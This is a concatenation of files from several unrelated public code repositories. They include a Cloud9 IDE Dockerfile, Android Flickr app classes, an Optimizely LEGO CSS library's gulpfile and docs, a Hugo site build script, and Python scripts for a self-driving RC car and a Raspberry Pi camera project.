refs/heads/master | <repo_name>chuyskywalker/docker-cloud9-ide<file_sep>/run.sh
docker run -d --name c9 -v /var/git:/workspace -p 8080:80 chuyskywalker/cloud9-ide
<file_sep>/Dockerfile
FROM ubuntu
# Install build items, clone in c9, build c9, install dumb-init, remove all build items and cleanup
RUN apt-get update \
&& apt-get install -y wget build-essential git python \
\
&& git clone --depth=1 git://github.com/c9/core.git /c9 \
&& /c9/scripts/install-sdk.sh \
&& mkdir /workspace \
\
&& wget https://github.com/Yelp/dumb-init/releases/download/v1.0.3/dumb-init_1.0.3_amd64.deb \
&& dpkg -i dumb-init_*.deb \
\
&& apt-get purge -y wget build-essential git python \
&& apt-get autoremove -y --purge \
&& apt-get clean \
&& rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/*
VOLUME /workspace
CMD [ "dumb-init", "/root/.c9/node/bin/node", "/c9/server.js", "--listen", "0.0.0.0", "-p", "80", "-a", ":", "-w", "/workspace" ]
<file_sep>/readme.md
# Cloud9 IDE in Docker
Run this for a quick browser-based IDE from your docker host.
```
# cd to the directory you want to edit
docker run -ti --rm -v `pwd`:/workspace -p 80:80 chuyskywalker/cloud9-ide
```
Then visit your docker host in your browser.
| df56143e8053d76f552a01a685669f5526a03c81 | [
"Markdown",
"Dockerfile",
"Shell"
] | 3 | Shell | chuyskywalker/docker-cloud9-ide | 5c02ff104c125c96db954212592a38bbaba084a2 | 7d9d4931c14bda8b85ab6e2d773d4d3965477eb2 |
refs/heads/master | <file_sep>package com.devnouh.myapplication;
import androidx.annotation.NonNull;
import java.io.Serializable;
class Photo implements Serializable {
private String title;
private String link;
private String author;
private String ID;
private String image;
Photo(String title, String link, String author, String ID, String image) {
this.title = title;
this.link = link;
this.author = author;
this.ID = ID;
this.image = image;
}
String getTitle() {
return title;
}
String getLink() {
return link;
}
String getAuthor() {
return author;
}
String getID() {
return ID;
}
String getImage() {
return image;
}
@NonNull
@Override
public String toString() {
return "title" + title;
}
}
<file_sep>package com.devnouh.myapplication;
import android.annotation.SuppressLint;
import android.app.AlertDialog;
import android.content.Context;
import android.content.res.Resources;
import android.view.LayoutInflater;
import android.view.View;
import android.widget.TextView;
class ShowDetailsDilaog {
private Photo mPhoto;
private Context mContext;
ShowDetailsDilaog(Context context, Photo photo) {
this.mPhoto = photo;
this.mContext = context;
}
void show() {
Resources r = mContext.getResources();
@SuppressLint("InflateParams")
View v = LayoutInflater.from(mContext).inflate(R.layout.show_dialog_details, null);
TextView tv_title = v.findViewById(R.id.details_title);
TextView tv_author = v.findViewById(R.id.details_author);
TextView tv_author_id = v.findViewById(R.id.details_author_id);
TextView tv_tags = v.findViewById(R.id.details_tags);
tv_title.setText(r.getString(R.string.details_title, mPhoto.getTitle()));
tv_author.setText(r.getString(R.string.details_author, mPhoto.getAuthor()));
tv_author_id.setText(r.getString(R.string.details_author_id, mPhoto.getID()));
// tv_tags.setText(r.getString(R.string.details_tags,mPhoto.getTags()));
AlertDialog.Builder alertDialog = new AlertDialog.Builder(mContext);
alertDialog.setView(v).show();
}
}
<file_sep>package com.devnouh.myapplication;
import android.app.SearchManager;
import android.app.SearchableInfo;
import android.content.SharedPreferences;
import android.os.Bundle;
import androidx.appcompat.app.AppCompatActivity;
import androidx.appcompat.widget.Toolbar;
import android.preference.PreferenceManager;
import android.view.Menu;
import android.view.MenuItem;
import android.widget.SearchView;
/**
 * Full-screen search entry point: hosts a toolbar {@link SearchView}, and on
 * submit persists the typed query to default shared preferences under the
 * key "TAGS" before finishing. Dismissing the search view also finishes the
 * activity, so this screen only ever produces (at most) one stored query.
 */
public class SearchActivity extends AppCompatActivity {
    // Kept as a field so the query-text listener can clear its focus on submit.
    SearchView sv;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_search);
        Toolbar toolbar = findViewById(R.id.toolbar);
        setSupportActionBar(toolbar);
        // NOTE(review): getSupportActionBar() may return null if the theme
        // supplies its own action bar -- confirm the theme before shipping.
        getSupportActionBar().setDisplayHomeAsUpEnabled(true);
        // Signal MainActivity to stop whatever `running` gates while the user
        // is searching (presumably a refresh loop -- confirm in MainActivity).
        com.devnouh.myapplication.MainActivity.running = false;
    }

    @Override
    public boolean onCreateOptionsMenu(Menu menu) {
        getMenuInflater().inflate(R.menu.search_activity_menu, menu);
        SearchManager sm = (SearchManager) getSystemService(SEARCH_SERVICE);
        sv = (SearchView) menu.findItem(R.id.search_act).getActionView();
        SearchableInfo searchableInfo = sm.getSearchableInfo(getComponentName());
        sv.setSearchableInfo(searchableInfo);
        sv.setQueryHint("search for tags");
        // Expand the view immediately so the keyboard opens without a tap.
        sv.setIconified(false);
        sv.setOnCloseListener(new SearchView.OnCloseListener() {
            @Override
            public boolean onClose() {
                // Closing the search is equivalent to leaving the screen.
                finish();
                return true;
            }
        });
        sv.setOnQueryTextListener(new SearchView.OnQueryTextListener() {
            @Override
            public boolean onQueryTextSubmit(String query) {
                // Hand the query back to the rest of the app via preferences.
                SharedPreferences shared = PreferenceManager.getDefaultSharedPreferences(SearchActivity.this);
                shared.edit().putString("TAGS", query).apply();
                sv.clearFocus();
                finish();
                return true;
            }

            @Override
            public boolean onQueryTextChange(String newText) {
                // No live filtering; only full submissions are handled.
                return false;
            }
        });
        return true;
        //return super.onCreateOptionsMenu(menu);
    }

    @Override
    public boolean onOptionsItemSelected(MenuItem item) {
        return super.onOptionsItemSelected(item);
    }
}
| a73ec17b86e21a8cfd1b4d5a44e1a9f39ee8c737 | [
"Java"
] | 3 | Java | noah20/Flickr-app | 708ee04f522d8f25705879356462974c1ffaabf7 | df8f7b41378a06d6f90fcd34d161ca937db3a4f2 |
refs/heads/master | <repo_name>tjj5036/lego<file_sep>/CHANGELOG.md
# Change Log
All notable changes to this project will be documented in this file.
This project adheres to [Semantic Versioning](http://semver.org/).
This file follows the format suggested by [Keep a CHANGELOG](https://github.com/olivierlacan/keep-a-changelog).
## [Unreleased][unreleased]
## [3.0.0][3.0.0] - 2015-09-01
### Added
- [Patch] Add "Charcoal" color `#383838`.
- [Patch] Checks to see if `$include-fonts` map exists. Allows usage of Lego without being forced to include brand font. (#90)
### Removed
- [Release] Remove `.lego-tag` from Core. (#72)
### Changed
- [Patch] Bump font weight for `.weight--bold` class to `600` so it's the same as a `<b>` tag.
- [Patch] Updated font styles for `.lego-table th`
### Fixed
- [Patch] Change the weight of `<b>` and `<strong>` tags to `600`.
## [2.0.0][2.0.0] - 2015-08-18
### Changed
- [Release] Major refactor of button styles and class names. New available class names are `.lego-button--highlight`, `lego-button--outline`, `.lego-button--outline-reverse`, `.lego-button--extra`, `.lego-button--dismiss`. `.lego-button--brand` has been deprecated. Usage for classes to follow shortly. (#92) (#85) (#74)
- [Release] Added `!important` to buttons so that when used as anchors the color is consistent.
## [1.0.0][1.0.0] - 2015-08-18
### Fixed
- [Patch] Change comments in `_spinner.scss` to refer to `.lego-overlay` since `.lego-spinner-wrap` doesn't exist. (#76)
### Changed
- [Patch] Removed concatenation from the `@font-face` URL strings because it was breaking the SCSS parser used for documentation generation.
- [Release] Renaming sizing trumps to be BEM consistent. (#69)
### Removed
- [Patch] Remove old gitignore targets from js days. (#97)
## [0.0.3][0.0.3] - 2015-08-05
### Added
- [Patch] Add a `.lego-pane--scroll-x` for setting `overflow-x` to `auto`.
- [Patch] Add a `.pointer-events--none` trump for disabling pointer events.
- [Patch] Add a `.cursor--move` trump for changing the cursor to `move`.
- [Patch] Allow `.lego-overlay` to be extended with `%lego-overlay`.
### Fixed
- [Patch] Fix the name of the npm module and changed the privacy setting to false.
## [0.0.2][0.0.2] - 2015-07-13
### Fixed
- [Patch] Fix the broken links in `CHANGELOG.md`. (#60)
### Changed
- [Patch] `.lego-popover` was dependant on `.lego-block-list-group` for styling its `border`, `border-radius`, and `padding` of child elements, however this added other undesired styles to `.lego-popover`. This change removes the link between `.lego-popover` and `.lego-block-list-group`.
### Added
- [Patch] Add Travis CI support to the LEGO repository.
- [Patch] Update `CONTRIBUTING.md` to include information on Git tags
- [Patch] Updated README.md to include example code and usage instructions.
- [Patch] Added `src/scss/core.scss` file so that Core could be compiled.
- [Patch] Added `sass` task to gulpfile.js to compile Core.
- [Patch] Added `npm start` script into `package.json` to run tests.
- [Patch] Added `npm start` script into `package.json` to run install processes.
### Removed
- [Patch] Removed unneeded gems from Gemfile.
## 0.0.1 - 2015-06-24
### Added
- [Patch] Use semantic versioning in LEGO (#58).
[unreleased]: https://github.com/optimizely/lego/compare/v3.0.0...HEAD
[0.0.2]: https://github.com/optimizely/lego/compare/v0.0.1...v0.0.2
[0.0.3]: https://github.com/optimizely/lego/compare/v0.0.2...v0.0.3
[1.0.0]: https://github.com/optimizely/lego/compare/v0.0.3...v1.0.0
[2.0.0]: https://github.com/optimizely/lego/compare/v1.0.0...v2.0.0
[3.0.0]: https://github.com/optimizely/lego/compare/v2.0.0...v3.0.0
<file_sep>/gulpfile.js
var bump = require('gulp-bump'),
    filter = require('gulp-filter'),
    git = require('gulp-git'),
    gulp = require('gulp'),
    gutil = require('gulp-util'),
    notify = require('gulp-notify'),
    svgSymbols = require('gulp-svg-symbols'),
    scsslint = require('gulp-scss-lint'),
    symlink = require('gulp-symlink'),
    sass = require('gulp-sass'),
    path = require("path"),
    tagVersion = require('gulp-tag-version');

// Source and destination paths shared by the tasks below.
var paths = {
  // Limiting linter to first-part directories.
  'styles' : [
    'src/core/**/*.scss',
    '!src/core/library/**/*.scss',
  ],
  svgSource : 'src/img/svg-icons/*.svg',
  svgDest : 'dist/img/',
  css: './dist/css/',
  core: './src/core/core.scss'
};

// Bumping version number and tagging the repository with it.
// Please read http://semver.org/
//
// https://www.npmjs.com/package/gulp-tag-version
//
// You can use the commands
//
//     gulp patch     # makes v0.1.0 → v0.1.1
//     gulp feature   # makes v0.1.1 → v0.2.0
//     gulp release   # makes v0.2.1 → v1.0.0
//
// To bump the version numbers accordingly after you did a patch,
// introduced a feature or made a backwards-incompatible release.
function increaseVersion(importance) {
  // Get all the files to bump version in
  return gulp.src(['./package.json'])
    // Bump the version number in those files
    .pipe(bump({type: importance}))
    // Save it back to filesystem
    .pipe(gulp.dest('./'))
    // Commit the changed version number
    .pipe(git.commit('New LEGO ' + importance + '.'))
    // Read only one file to get the version number
    .pipe(filter('package.json'))
    // Tag it in the repository
    .pipe(tagVersion());
}

// Creates SVG sprite and demo page.
//     gulp svg
gulp.task('svg', function () {
  return gulp.src(paths.svgSource)
    .pipe(svgSymbols({
      title: false,
      templates: ['default-svg', 'default-demo']
    }))
    .pipe(gulp.dest(paths.svgDest));
});

// Compiles Core SCSS into dist/css.
//     gulp sass
gulp.task('sass', function() {
  // Return the stream so gulp can tell when this async task has finished
  // (the original dropped the return value, so completion was never signalled).
  return gulp.src(paths.core)
    .pipe(sass({
      errLogToConsole: true
    }))
    .pipe(gulp.dest(paths.css));
});

// Runs SCSS linter.
//     gulp lint
gulp.task('lint', function() {
  // Return the stream for the same completion-tracking reason as 'sass'.
  return gulp.src(paths.styles)
    .pipe(scsslint({
      'bundleExec': true,
      'config': '.scss-lint.yml'
    }))
    .pipe(scsslint.failReporter());
});

// Symlink the .pre-commit file.
gulp.task('hook', function () {
  return gulp.src('.pre-commit')
    .pipe(symlink('.git/hooks/pre-commit', {
      force: true
    }));
});

// Release LEGO patch
// Bumps version from v0.1.0 to v0.1.1
gulp.task('patch', function() {
  return increaseVersion('patch');
});

// Release LEGO feature
// Bumps version from v0.1.1 to v0.2.0
gulp.task('feature', function() {
  return increaseVersion('minor');
});

// Release breaking LEGO change
// Bumps version from v0.2.1 to v1.0.0
gulp.task('release', function() {
  return increaseVersion('major');
});

// NOTE: gulp.task(name) with a single argument is a *getter* in gulp 3, so the
// original `gulp.task('default');` never registered anything and plain `gulp`
// failed with "Task 'default' is not in your gulpfile". Register an explicit
// (currently empty) default task instead.
gulp.task('default', function() {});
<file_sep>/CONTRIBUTING.md
# Contributing to LEGO
1. Branch off of master: `git checkout -b username/branch-name`.
2. Make your changes, commit your code, and open a pull request against `master`. Add at least one reviewer.
3. Add your change to the "Unreleased" section of the `CHANGELOG.md` under one of the following sub-sections:
* **Added**: for new features.
* **Changed**: for changes in existing functionality.
* **Deprecated**: for once-stable features removed in upcoming releases.
* **Removed**: for deprecated features removed in this release.
* **Fixed**: for any bug fixes.
* **Security**: to invite users to upgrade in case of vulnerabilities.
Your message should follow the following format:
```
[Importance] Message (GitHub Issue Number)
```
Where `Importance` is:
* Patch
* Feature
* Release
GitHub issue number is the number of the GitHub issue, if applicable, preceded
by a `#`.
## Releasing a new version of LEGO
1. Open the `CHANGELOG.md` and look at the "Unreleased" contributions.
2. `git checkout master` and run `gulp patch`, `gulp feature`, or `gulp release` depending on the highest importance issue.
3. Update the `CHANGELOG.md` to reflect the new release and commit the change on `master`.
4. Push the changes to `master` with `git push` and `git push --tags`.
5. [Create a new release on GitHub](https://github.com/optimizely/lego/releases/new) using the version number gulp generated. Paste the "Unreleased" contributions from the `CHANGELOG.md` in the release notes.
6. Run `npm publish ./` to push the version to NPM. You must be a LEGO contributor on NPM to do this.
<file_sep>/README.md
# LEGO Component Library
This document contains two sets of instructions:
1. Including LEGO in your project
2. Contributing new CSS to LEGO
## Including LEGO in your project
LEGO is published as an npm module called `optimizely-lego`. To install:
```
npm install optimizely-lego --save-dev
```
which should add the dependency to your `package.json` file.
If using Gulp for your project:
```javascript
gulp.task('sass', function() {
gulp.src('scss/**/*.scss')
.pipe(sass({
errLogToConsole: true,
includePaths : [
require('optimizely-lego').includePath
]
}))
.pipe(gulp.dest('path/to/css'));
});
```
### Example Starter Code
Download [LEGO starter code](assets/lego-starter-code.zip) that includes the required file structure for new projects. Note that the paths to `core/...` will only work if the above gulp task is in place.
### Structure of LEGO
LEGO consists of two parts:
1. **Core**
- Base styles used as the foundation for any site.
- This code lives in this LEGO repository and is a dependency for platform code.
2. **Platform (.e.g, `mobile`)**
- Platform or device specific built on top of Core.
- This code lives in the platform repo, pulling Core as a dependency.
For example, if you're building a mobile site, `mobile.scss` would contain:
```scss
// # Mobile
// Root file driving the Mobile CSS.
// Compass polyfills
@import 'core/core-polyfills';
// ## Core functions and mixins
@import 'core/partials/elements/functions';
@import 'core/partials/elements/mixins';
// ## Core and p13n variables
// Import `core` and `mobile` variables
@import 'core/core-variables';
@import 'mobile/mobile-variables';
// ## Core and mobile partials
// Import `core` and `mobile` partials
@import 'core/core-partials';
@import 'mobile/mobile-partials';
// ## Trumps
// Trumps use `!important` classes for overrides and should always be loaded last.
@import 'core/partials/trumps/background';
@import 'core/partials/trumps/layout';
@import 'core/partials/trumps/margin';
@import 'core/partials/trumps/padding';
@import 'core/partials/trumps/type';
@import 'core/partials/trumps/sizing';
```
## Contributing to LEGO
The following is for users planning to make contributions to LEGO.
Important: see [CONTRIBUTING.md](CONTRIBUTING.md) for details on our versioning system.
After cloning the `lego` repo run:
```bash
npm start
```
This will run the npm `start` commands found in package.json that installs the dependencies.
### Cheat Sheet
- **`gulp`** : Runs the default compass watch process.
- **`gulp hook`** : Installs the linter pre-commit hook (please do this!).
- **`gulp lint`** : Runs the SCSS linter.
- **`gulp svg`** : Builds svg sprite and demo page into `dist`.
- **`gulp sass`** : Builds Core-only css file for testing into `dist`.
- **`gulp feature | patch | release`** : For tagging releases.
### Getting Started
#### Pre-Commit Hook & Linter
As part of the installation process above you should have run `gulp hook`. This will run the task that creates a git pre-commit hook. This hook fires a SCSS linter that checks to see that any SCSS files included in the commit conform to our [standards](https://github.com/optimizely/lego/blob/master/.scss-lint.yml). These rules ensure the LEGO SCSS is consistent.
If the the linter finds issues you'll see messages in your terminal like this:
[13:56:12] Using gulpfile /Library/WebServer/Documents/lego/gulpfile.js
[13:56:12] Starting 'lint'...
[13:56:12] Finished 'lint' after 4.32 ms
[13:56:15] 1 issues found in /Library/WebServer/Documents/lego/src/scss/desktop/_desktop-partials.scss
[13:56:15] /Library/WebServer/Documents/lego/src/scss/desktop/_desktop-partials.scss:24 [W] Files should end with a trailing newline
Here the 'lint' process ran and found 1 issue, providing the file, line number, and reason for the problem.
You can also run:
gulp lint
at any time to check your files before you commit.
#### Run the Sass compile process
To output Core CSS file to the `dist` directory run:
gulp sass
#### Generating the SVG Icon Sprite
When adding new icons to the library place the individual svg files into:
src/img/svg-icons
and then run:
gulp svg
The resulting sprite will be built to:
dist/img/svg-symbols.svg
This is the file that is included as the first child of the body on every page of Optimizely.
## Philosophy
LEGO stands for Low-level Elements and Global Objects. It's a collection of CSS/HTML/JS elements and objects meant to be combined and extended to create larger interfaces, influenced primarily by Harry Roberts' work on [inuit.css](https://github.com/csswizardry/inuit.css/) and Jonathan Snook's [SMACSS](https://smacss.com/). The goals of this library are to provide code that is...
1. **Abstracted.** Component names shouldn't be derived from the content they contain. Class names should convey structural meaning.
1. **Reusable.** Components should be generic enough to be reused throughout the site. They should make no assumptions what page/view they will be used on. Problems solved in one area should be easily applied elsewhere.
1. **Mixable.** Components should be able to join together to create larger blocks.
1. **Powered by variables.** Nearly all design elements — colors, fonts, spacings, shadows — should be defined using the pre-existing [variables](https://github.com/optimizely/lego/blob/master/core/_core-variables.scss).
By achieving these goals our code becomes...
1. **Scalable.** Reusing patterns means new elements can be created faster and with minimal additional CSS.
1. **Consistent.** Not only will developers be able to read each other's code more easily we'll have a better end-user experience across the product.
1. **Smaller and [DRY](http://en.wikipedia.org/wiki/Don't_repeat_yourself)er.** Since we're constantly reusing low-level objects to build larger ones, often with Sass' <code>@extend</code> functionality, we cut down on CSS bloat. Less code means fewer bugs.
#### Writing Good Classes
In order to write HTML and CSS classes that provide meaning for developers we're using the BEM syntax. BEM stands for Block, Element, Modifier and is becoming a popular approach to building CSS and HTML that describes an object's internal relationships.
```html
<div class="lego-grid lego-grid--gutter">
<div class="lego-grid__cell">
<div class="docs-dummy-content">grid cell</div>
</div>
<div class="lego-grid__cell">
<div class="docs-dummy-content">grid cell</div>
</div>
<div class="lego-grid__cell">
<div class="docs-dummy-content">grid cell</div>
</div>
</div>
```
In the example above...
- **Block** is represented by <code>lego-grid</code> and is the parent class of the object.
- **Elements** are children of the object. They are named by joining the parent class name and a child class with a double underscore. In this case <code>lego-grid__cell</code>.
- **Modifiers** are variations on the default. In this case we have a <code>lego-grid--gutter</code>. This provides spacing between the cells.
Though somewhat verbose, this syntax makes it easy to determine the child/parent relationships between bits of code, especially when different objects are mixed together. It can be tricky naming elements so some judgment is required. This becomes easier over time.
For a longer discussion, Harry Roberts provides a <a href="http://csswizardry.com/2013/01/mindbemding-getting-your-head-round-bem-syntax/">good introduction</a> to the syntax.
#### Further Reading
- [MindBEMding – getting your head ’round BEM syntax](http://csswizardry.com/2013/01/mindbemding-getting-your-head-round-bem-syntax/). Introduction to BEM.
- [About HTML semantics and front-end architecture](http://nicolasgallagher.com/about-html-semantics-front-end-architecture/). What is a meaningful class name?
- [OOCSS + Sass = The best way to CSS](http://ianstormtaylor.com/oocss-plus-sass-is-the-best-way-to-css/). Some examples of bulding on existing objects using `@extend` in Sass.
- [Hacks for dealing with specificity](http://csswizardry.com/2014/07/hacks-for-dealing-with-specificity/). Some more technical details around specificity.
- [Normalising designs for better quality CSS (Video)](https://www.youtube.com/watch?v=ldx4ZFxMEeo). A conference presentation about normalizing designs and the process from design to HTML.
| eeba3c073ff7a82ed0a653e59b798dca587c45f1 | [
"Markdown",
"JavaScript"
] | 4 | Markdown | tjj5036/lego | 9cbef73f44260fe04027475444f260f2282539d6 | 853f899be9f4e1580bdee88ddd0d3ae8448c305e |
refs/heads/master | <file_sep># Welcome
Welcome to Harbor static website developed in Hugo. Hugo is an open-source static site generator. To find out more about hugo you can check out their [website](https://gohugo.io/) as well as [developer documentation](https://gohugo.io/documentation/)
# Project Setup
## Step 1: Clone project
```
$ git clone https://github.com/apparent/harbor-hugo.git <path>/<to>/<project>
```
> To install into the folder you're currently in, use the following command:
>
> ```
> $ git clone https://github.com/apparent/harbor-hugo.git .
> ```
## Step 2: Install dependencies
Go to the root of the project and install dependencies using NPM.
```
$ cd themes/harbor/
$ npm install
```
## Step 3: Run on dev/local environment
Go to the root
```
$ cd <path>/<to>/<project root>
```
Start hugo server and keep listening to any changes on config,content,data,layouts,static or themes.
```
$ hugo server -D
```
or
```
$ hugo server -D --config config.yaml
```
*Here config.yaml is base config file and is identified by default.*
### Listening to scss changes
This project uses gulp and scss for frontend/project workflow. To keep listening to scss changes:
```
$ cd <path>/<to>/<project root>
$ cd themes/harbor/
$ make dev
```
*In this instance make dev is simply runing gulp's watch command.*
> ### Test Live config
> ```
> $ hugo server -D --config config.yaml,config-prod.yaml
> ```
>
> *Adding --config parameter in this fashion loads "**config.yaml**" first and then overrides any similar config with the ones in "**config-live.yaml**"*
## Step 4: Prepare for deployment to production
As Hugo is a static site generator, none of the dynamic hugo logic will work in the production. You will first need to render your project as a static HTML project using hugo cli command.
To render your project, use the following command:
```
#Build project for LIVE
$ sh build.sh -e live
#Build project for Staging
$ sh build.sh -e staging
#Build project for local
$ sh build.sh -e dev
# or,
$ sh build.sh
```<file_sep>#!/bin/bash
# -------------------- #
# --- Functions --- #
# -------------------- #
# LogIt TYPE MESSAGE
#   Print MESSAGE to stdout wrapped in an ANSI colour chosen by TYPE:
#   warning -> green, error -> red, success -> cyan, anything else -> default.
LogIt(){
    # Positional parameters, named for readability.
    local _type=$1
    local _message=$2
    local _color

    # Select the ANSI escape for the requested severity.
    case "$_type" in
        warning) _color='\033[32m' ;;  # green
        error)   _color='\033[31m' ;;  # red
        success) _color='\033[36m' ;;  # cyan
        *)       _color='\033[38m' ;;  # default foreground colour
    esac

    # printf '%b' expands the backslash escapes portably: bash's plain
    # `echo` would print "\033" literally (the original relied on being
    # run via `sh`, where dash's echo happens to expand escapes).
    printf '%b\n' "${_color} ${_message} \033[0m"
}
# -------------------- #
# --- Script --- #
# -------------------- #

# Option parsing:
#   -e <env>  build target: live | staging | (anything else => dev)
#   -c        delete previously generated hash-named css/js bundles first
while getopts e:c option
do
    case "${option}"
    in
        e) ENV=${OPTARG};;
        c)
            LogIt "warning" "Cleaning up residual css files from /themes/harbor/static/css"
            rm -rf themes/harbor/static/css/core-*
            LogIt "warning" "Cleaning up residual js files from /themes/harbor/static/js"
            rm -rf themes/harbor/static/js/fresh-*
            # NOTE(review): under bash `echo "\n"` prints a literal \n; the
            # README runs this file via `sh build.sh`, where dash's echo does
            # expand it -- confirm the intended interpreter (shebang says bash).
            echo "\n";
            ;;
    esac
done

# Build the theme assets (css/js/static) with gulp before rendering hugo.
LogIt "warning" "Initiating asset, css, static files build."
cd themes/harbor
gulp build
echo "\n";

LogIt "warning" "Building static project."
cd ../..

# Check if environment is defined and render correct environment
# NOTE(review): several messages below end with `".` -- the stray dot after
# the closing quote is appended to the argument; likely a typo to clean up.
case $ENV in
    live)
        LogIt "warning" "Live: Cleaning up 'public' folder. ".
        rm -rf public/*
        # Production overrides layered on top of the base config.
        hugo --config config.yaml,config-prod.yaml
        cp LICENSE public/LICENSE
        # GitHub Pages custom-domain marker file.
        echo -n "goharbor.io" > public/CNAME
        LogIt "success" "Live: Site build complete. Please check /public folder and deploy it using ftp,sftp or ssh".
        ;;
    staging)
        LogIt "warning" "Staging: Cleaning up 'public-staging' folder. ".
        rm -rf public-staging/*
        hugo --config config.yaml,config-stage.yaml
        LogIt "success" "Staging: Site build complete. Please check /public-staging folder and deploy it using ftp,sftp or ssh".
        ;;
    *)
        # Default (dev) build uses the base config only.
        LogIt "warning" "Dev: Cleaning up 'public-dev' folder. ".
        rm -rf public-dev/*
        hugo
        LogIt "success" "Dev: Site build complete. Please check /public-dev folder."
        ;;
esac
"Markdown",
"Shell"
] | 2 | Markdown | steven-zou/blog | a417e3eca8a1eb109d8082463c5e0b87cf298a7b | 8fc5489bbc4e9085c1bf158d7890bc9c208e4898 |
refs/heads/master | <file_sep>Rails.application.routes.draw do
resources :journals
root 'journals#index'
end
<file_sep>json.extract! @journal, :id, :title, :text, :created_at, :updated_at
| e538627f1c3298f26af1938cdc36236ce3a8d216 | [
"Ruby"
] | 2 | Ruby | ellisandy/docker-test | 02b43ec256628a56dcc5c18127c826ee8be575f6 | 845da70efd88e95c10b3175cc0f2e706d72c9c73 |
refs/heads/master | <file_sep># Using Android IP Webcam video .jpg stream (tested) in Python2 OpenCV3
import urllib
import cv2
import numpy as np
import time

# NOTE(review): this script is a training-data collector bolted onto an
# Android IP-Webcam snapshot reader, and as committed it cannot run:
#   * frame / total_frame / saved_frame / X / y / start are used but never
#     initialised
#   * pygame and os are used but never imported (KEYDOWN is unqualified too)
#   * self.k / self.ser / self.send_inst belong to the class this code was
#     lifted from and are undefined at module level
#   * urllib.urlopen is Python 2 only (urllib.request.urlopen in Python 3)
# The comments below describe the *intended* behaviour.

# Replace the URL with your own IPwebcam shot.jpg IP:port
url='http://192.168.0.100:8080/shot.jpg'

while True:
    # Use urllib to get the image from the IP camera
    imgResp = urllib.urlopen(url)
    # Decode the raw JPEG bytes directly into a single-channel OpenCV image.
    image = cv2.imdecode(np.frombuffer(imgResp.read(), dtype=np.uint8), cv2.IMREAD_GRAYSCALE)
    # Numpy to convert into a array
    #imgNp = np.array(bytearray(imgResp.read()),dtype=np.uint8)
    # Finally decode the array to OpenCV usable format ;)
    #image = cv2.imdecode(imgNp,-1)
    cv2.imshow('image', image)
    print(image.shape)
    # put the image on screen
    #cv2.imshow('IPWebcam',image)
    height, width = image.shape
    # Keep only the lower half of the frame -- presumably the road area in
    # front of the car (TODO confirm camera mounting).
    roi = image[int(height/2):height, :]
    #print(roi.shape)
    # Flatten the ROI into one float32 training-sample row.
    temp_array = roi.reshape(1, int(height/2) * width).astype(np.float32)
    #To give the processor some less stress
    #time.sleep(0.1)
    # Quit if q is pressed
    frame += 1        # NOTE(review): never initialised before first use
    total_frame += 1  # NOTE(review): never initialised before first use
    # get input from human driver
    for event in pygame.event.get():
        if event.type == KEYDOWN:
            key_input = pygame.key.get_pressed()
            # complex orders
            if key_input[pygame.K_UP] and key_input[pygame.K_RIGHT]:
                print("Forward Right")
                # Record the flattened frame and its steering label
                # (self.k rows look like one-hot labels -- TODO confirm).
                X = np.vstack((X, temp_array))
                y = np.vstack((y, self.k[1]))
                saved_frame += 1
                # Command bytes 1-9 are presumably defined by the car's
                # firmware protocol -- verify against the Arduino sketch.
                self.ser.write(chr(6).encode())
            elif key_input[pygame.K_UP] and key_input[pygame.K_LEFT]:
                print("Forward Left")
                X = np.vstack((X, temp_array))
                y = np.vstack((y, self.k[0]))
                saved_frame += 1
                self.ser.write(chr(7).encode())
            elif key_input[pygame.K_DOWN] and key_input[pygame.K_RIGHT]:
                # Reverse manoeuvres are driven but not saved as samples.
                print("Reverse Right")
                self.ser.write(chr(8).encode())
            elif key_input[pygame.K_DOWN] and key_input[pygame.K_LEFT]:
                print("Reverse Left")
                self.ser.write(chr(9).encode())
            # simple orders
            elif key_input[pygame.K_UP]:
                print("Forward")
                saved_frame += 1
                X = np.vstack((X, temp_array))
                y = np.vstack((y, self.k[2]))
                self.ser.write(chr(1).encode())
            elif key_input[pygame.K_DOWN]:
                print("Reverse")
                self.ser.write(chr(2).encode())
            elif key_input[pygame.K_RIGHT]:
                print("Right")
                X = np.vstack((X, temp_array))
                y = np.vstack((y, self.k[1]))
                saved_frame += 1
                self.ser.write(chr(3).encode())
            elif key_input[pygame.K_LEFT]:
                print("Left")
                X = np.vstack((X, temp_array))
                y = np.vstack((y, self.k[0]))
                saved_frame += 1
                self.ser.write(chr(4).encode())
            elif key_input[pygame.K_x] or key_input[pygame.K_q]:
                # x/q = stop collecting: halt the car, close the serial port.
                print("exit")
                self.send_inst = False
                self.ser.write(chr(0).encode())
                self.ser.close()
                break
        elif event.type == pygame.KEYUP:
            # Key released: send the all-stop command byte.
            self.ser.write(chr(0).encode())
    if cv2.waitKey(1) & 0xFF == ord('q'):
        break

# save data as a numpy file
file_name = str(int(time.time()))
directory = "training_data"
if not os.path.exists(directory):
    os.makedirs(directory)
try:
    np.savez(directory + '/' + file_name + '.npz', train=X, train_labels=y)
except IOError as e:
    print(e)
end = cv2.getTickCount()
# calculate streaming duration
# NOTE(review): `start` is never set; a cv2.getTickCount() before the loop
# is missing, so this line raises NameError as written.
print("Streaming duration: , %.2fs" % ((end - start) / cv2.getTickFrequency()))
print(X.shape)
print(y.shape)
print("Total frame: ", total_frame)
print("Saved frame: ", saved_frame)
print("Dropped frame: ", total_frame - saved_frame)
<file_sep># SelfDrivingCar
Transforming a remote-control car into an autonomous car that can steer and detect obstacles.
| 855f85217bfb0dd1c5ffd975c55e4fb06aaad1ef | [
"Markdown",
"Python"
] | 2 | Python | Othello11/SelfDrivingCar | 100928c146db32c8d14c1227a9f7f2e6441a114a | 2a1d785322f241885a9cddc286114aaa91067cc6 |
refs/heads/master | <repo_name>johnabfaria/bambus.py<file_sep>/pic_it.py
import os

# Directory where the camera drops its capture and where renamed photos live.
_BAMBUS_DIR = "C:\\Python33\\Bambus\\"


def snap(name):
    """Rename the freshly captured photo ``Bambi.jpg`` to ``name``.

    main.py calls this as ``pic_it.snap(name)``. The original definition
    read ``def pic_it.snap(name):`` which is a SyntaxError -- the module
    qualifier belongs at the call site, not in the definition.
    """
    new_name = _BAMBUS_DIR + name
    os.rename(_BAMBUS_DIR + "Bambi.jpg", new_name)
<file_sep>/README.md
bambus.py
=========
<file_sep>/main.py
import pic_it
import tweet_it
import text_it
import drop_it
import pin
import time

"""
This is the main program that will use pin to read input from the Raspberry Pi
using RPi.GPIO. If input from the IR motion sensor is positive, the camera is
activated, a photo snapped and saved locally. The photo is tweeted and then
uploaded to Dropbox, and a text message (via Twilio) is sent to the contact
